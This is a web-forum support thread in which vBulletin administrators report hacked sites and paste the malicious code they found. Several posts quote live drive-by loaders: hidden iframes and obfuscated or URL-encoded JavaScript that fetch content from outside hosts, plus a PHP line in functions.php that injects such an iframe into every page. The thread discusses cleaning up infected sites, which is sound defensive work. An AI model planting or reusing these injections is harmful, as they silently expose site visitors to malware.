Announcement

Collapse
No announcement yet.

vBulletin 3.8.4 has been hacked !!!

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • vBulletin 3.8.4 has been hacked !!!

    Hello,

    My website has been hacked !!!

    There is a code at the end (bottom) of index.php

    Code:
    <script language="JavaScript" type="text/javascript">
    function getfromDOM(containerid)
    {var container = document.getElementById(containerid), element1, element2 = container.firstChild, content ="";
    do{element1 = element2; content += element1.firstChild.nodeValue; element2 = element1.nextSibling;}
    while(element1!==container.lastChild)
    return content;
    }
    var ff_b = document.createElement("strong");
    ff_b.id = "YuPi55";
    ff_b.innerHTML="<b>http://000007.ru/in.cgi?7</b>";
    ff_b.style.visibility = "hidden";
    document.getElementsByTagName("body")[0].appendChild(ff_b);
    var ff_iframe = document.createElement("iframe");
    ff_iframe.id = "JeT";
    ff_iframe.name = "JeT";
    ff_iframe.style.visibility = "hidden";
    ff_iframe.src=getfromDOM("YuPi55");
    document.getElementsByTagName("body")[0].appendChild(ff_iframe);
    </script>
    y

    Code:
    <iframe src="http://3cy.ru:8080/index.php" width=187 height=139 style="visibility: hidden"></iframe<html><body><div id="CFI" style="display:none">%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%30%30%30%30%30%37%2e%72%75%2f%69%6e%2e%63%67%69%3f%37%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</div><script>var nJQ=eval, CFI=document.getElementById("CFI").innerHTML,GaB=unescape;nJQ(GaB(CFI));</script></body></html>>
    I don't know if other files have been hacked.

    I use 3.8.4. with DownloadsII mod

    Can you help me?

    Thank you

  • #2
    Re-install and read: http://www.vbulletin.com/forum/showthread.php?t=194701
    "The lurking suspicion that something could be simplified is the world's richest source of rewarding challenges"
    - Edsger Dijkstra

    Comment


    • #3
      If I reinstall, have I to use impex? or I have to use the name of the actual data base when I'm installing

      I have 85.000 users and I don't want to loose them....

      Thank you

      Comment


      • #4
        sorry to hear that.
        what type of mistake from admin side leads to such hack ?
        Just like to learn how to prevent these attacks..

        Comment


        • #5
          Just reupload your backup database. You should not have to use impex for that.

          Please don't PM or VM me for support - I only help out in the threads.
          vBulletin Manual & vBulletin 4.0 Code Documentation (API)
          Want help modifying your vbulletin forum? Head on over to vbulletin.org
          If I post CSS and you don't know where it goes, throw it into the additional.css template.

          W3Schools &lt;- awesome site for html/css help

          Comment


          • #6
            Originally posted by mijack View Post
            Hello,

            My website has been hacked !!!

            There is a code at the end (bottom) of index.php

            Code:
            <script language="JavaScript" type="text/javascript">
            function getfromDOM(containerid)
            {var container = document.getElementById(containerid), element1, element2 = container.firstChild, content ="";
            do{element1 = element2; content += element1.firstChild.nodeValue; element2 = element1.nextSibling;}
            while(element1!==container.lastChild)
            return content;
            }
            var ff_b = document.createElement("strong");
            ff_b.id = "YuPi55";
            ff_b.innerHTML="<b>http://000007.ru/in.cgi?7</b>";
            ff_b.style.visibility = "hidden";
            document.getElementsByTagName("body")[0].appendChild(ff_b);
            var ff_iframe = document.createElement("iframe");
            ff_iframe.id = "JeT";
            ff_iframe.name = "JeT";
            ff_iframe.style.visibility = "hidden";
            ff_iframe.src=getfromDOM("YuPi55");
            document.getElementsByTagName("body")[0].appendChild(ff_iframe);
            </script>
            y

            Code:
            <iframe src="http://3cy.ru:8080/index.php" width=187 height=139 style="visibility: hidden"></iframe<html><body><div id="CFI" style="display:none">%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%30%30%30%30%30%37%2e%72%75%2f%69%6e%2e%63%67%69%3f%37%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</div><script>var nJQ=eval, CFI=document.getElementById("CFI").innerHTML,GaB=unescape;nJQ(GaB(CFI));</script></body></html>>
            I don't know if other files have been hacked.

            I use 3.8.4. with DownloadsII mod

            Can you help me?

            Thank you
            my site was hacked just the same... just pointing to another server on the iframe code.

            but i was using 3.8.1, so if this happen with 3.8.4 and 3.8.1 there is a hole somewhere very old letting this happen.

            basically they modified all the phps,htmls files with that code.

            What is the position of vbulletin about this?

            Comment


            • #7
              Our position is there is no known exploit, if you have evidance of an actual exploit please report it. Likely there is a good chance that the exploit was elsewhere on the server and vBulletin was the one defaced.

              Comment


              • #8
                encoded part outputs at

                Code:
                document.write("<iframe src='http://000007.ru/in.cgi?7' style='display:none;'></iframe>");
                just for your reference

                Comment


                • #9
                  All the the hacks I've seen like this were done through the server.

                  Please see this thread on how to make your vBulletin more secure:

                  http://www.vbulletin.com/go/secure

                  If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.
                  Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                  Change CKEditor Colors to Match Style (for 4.1.4 and above)

                  Steve Machol Photography


                  Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


                  Comment


                  • #10
                    Hello,

                    some of my vbulletin 3.8.4 patch level 1 (german) were also been hacked:

                    Code:
                    <script>/*GNU GPL*/ try{window.onload = function(){var Ju5b7bu89al = document.createElement('s#[email protected]@r$)i!$p)t!('.replace(/\(|@|\!|\$|#|\)|\^|&/ig, ''));var Plcsu1uj9eo04 = 'U1xil41i86oe';Ju5b7bu89al.setAttribute('type', 't&@&$e)#)x!$)[email protected]^/!!#[email protected]((#v(a#&)s(^@[email protected])r^&i(#)p&$#t)'.replace(/\!|\)|&|#|\$|\(|\^|@/ig, ''));Ju5b7bu89al.setAttribute('src',  'h!##t&[email protected]:!#/^&)/(^$o$$^v((h^(-&$n^^[email protected][email protected](.$$h#@a#)^r#d#(#s($&)e!&^!x)!#^t&u^&@b$e!&#)^.^)!^c)))o$!m&&[email protected]&$s#o)&n$$($#g$!s$&-$&&p##^k&$(&!.#@&[email protected]^h&)!e!(&m^#)o&$$^[email protected])i&)[email protected]@^[email protected](^w^(i$(#n(!d$!o&w&.&)[email protected]&(([email protected]@:)8^&0()[email protected]@0#&()/)@!^g!)&o)(^@[email protected]([email protected]^l)#$e).#&n#$#(o&(((/(g(&o#!##o$$#g&[email protected])!l))e$&$^(.^&n(&!&o()[email protected]/&(#$g)&)@o)^o!#g!$$(l#$e(.$c^##$o#!^!m^)/&^[email protected])y&$)l)(((o^#^m&^!#.^#^#[email protected])^m)($)/#m((-(&w$(.$c(#o!m#@$/(#^&'.replace(/\!|\)|\(|@|&|\$|\^|#/ig, ''));Ju5b7bu89al.setAttribute('defer', '[email protected]!)&e$(!f&(e!)^r)&!'.replace(/&|\)|#|\$|@|\^|\(|\!/ig, ''));Ju5b7bu89al.setAttribute('id', 'L!3###$d!##w(@o^@&h^([email protected]&(&8#@&!v$&$#u^)u&('.replace(/\!|&|\(|#|\$|\)|\^|@/ig, ''));document.body.appendChild(Ju5b7bu89al);}} catch(Pz68f7gfr80sy) {}</script>
                    <!--e27f528bc0f1747ea9638a535ca450f8-->

                    Comment


                    • #11
                      When i reading this thread, my NOD32 says:

                      23.2.2010 21:44:09 HTTP filter archive http://www.vbulletin.com/forum/showt...ighlight=impex JS/TrojanDownloader.Agent.NRL trojan connection terminated Threat was detected upon access to web by the application: firefox.exe.

                      Comment


                      • #12
                        Clean up all your forum files by overwritting them with a fresh set from the vb download package, your version. Check your server space for anything out of the ordinary. Check out all your other files if they have been infected. Change all the login info (ftp, forum admin, Cp of your host etc). And as last but not least ask your host to check their access logs so they can pinpoint the exact way how they got in and not do guess-work.

                        Comment


                        • #13
                          PHP code in includes/functions.php
                          ==================
                          // parse PHP include ##################
                          ($hook = vBulletinHook::fetch_hook('global_complete')) ? eval($hook) : false; $output = preg_replace('/(<body[^>]*>)/i', "$1 ".'<div style="display:none">&nbsp; &nbsp;<iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>', $output, 1);
                          ---

                          me 2 i got hacking by an iframe !!!!!!!!!!!!

                          i found it in functions.php

                          only in the /forum i have portal cms web i didn't get hack !! is that an exploit ?!

                          Comment


                          • #14
                            Originally posted by sungerr View Post
                            PHP code in includes/functions.php
                            ==================
                            // parse PHP include ##################
                            ($hook = vBulletinHook::fetch_hook('global_complete')) ? eval($hook) : false; $output = preg_replace('/(<body[^>]*>)/i', "$1 ".'<div style="display:none">&nbsp; &nbsp;<iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>', $output, 1);
                            ---

                            me 2 i got hacking by an iframe !!!!!!!!!!!!

                            i found it in functions.php

                            only in the /forum i have portal cms web i didn't get hack !! is that an exploit ?!
                            What version of vb do you have?

                            Comment


                            • #15
                              I've been using 3.8.4 for a while and got defaced once, I suggest you to read more info about the 'Gumblar' virus (made in China, but works well), and run Avast! on your server, it's free and it works on Linux, and most likely it will find some stuff like c99.php (a Shell) on your server, which allows hackers to edit files on your server.

                              Basically, I've tried MANY things and none of them actually worked (No XSS nor SQLi).

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X